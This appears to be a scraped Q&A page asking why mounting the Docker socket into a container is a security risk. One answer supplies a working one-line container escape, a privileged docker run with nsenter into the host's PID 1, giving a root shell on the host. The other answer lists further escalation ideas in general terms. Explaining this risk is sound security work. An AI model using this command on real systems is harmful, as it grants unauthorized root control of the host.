Home > Software design >  What are the things I can do by mounting /var/run/docker.sock as a volume to a docker container?
What are the things I can do by mounting /var/run/docker.sock as a volume to a docker container?

Time:06-14

After mounting /var/run/docker.sock to a running docker container, I would like to explore the possibilities. Can I issue docker commands from inside the container, like docker stop? Why is it considered a security risk:- what exact commands could I run as a root user in docker that could possibly compromise the host?

CodePudding user response:

It's trivial to escalate access to the docker socket to a root shell on the host.

docker run -it --rm --privileged --pid host debian nsenter -t 1 -m -u -n -i bash

CodePudding user response:

I couldn't give you exact commands to execute since I'm not testing this but I'm assuming you could:

  • Execute docker commands, including mounting host volumes to newly spawned docker containers, allowing you to write to the host
  • Overwrite the socket to somehow inject arbitrary code into the host
  • Escalate privileges to other docker containers running on the same machine

Page link:https//www.codepudding.com/Softwaredesign/441756.html

Prev:How can I create data structure with multiple values in Swift?
Next:Append a character to the out using unix command
  • Related

About Us:  Contact Us      Terms of Service       Privacy Policy

Copyright © 2010-2023,Powered By CodePudding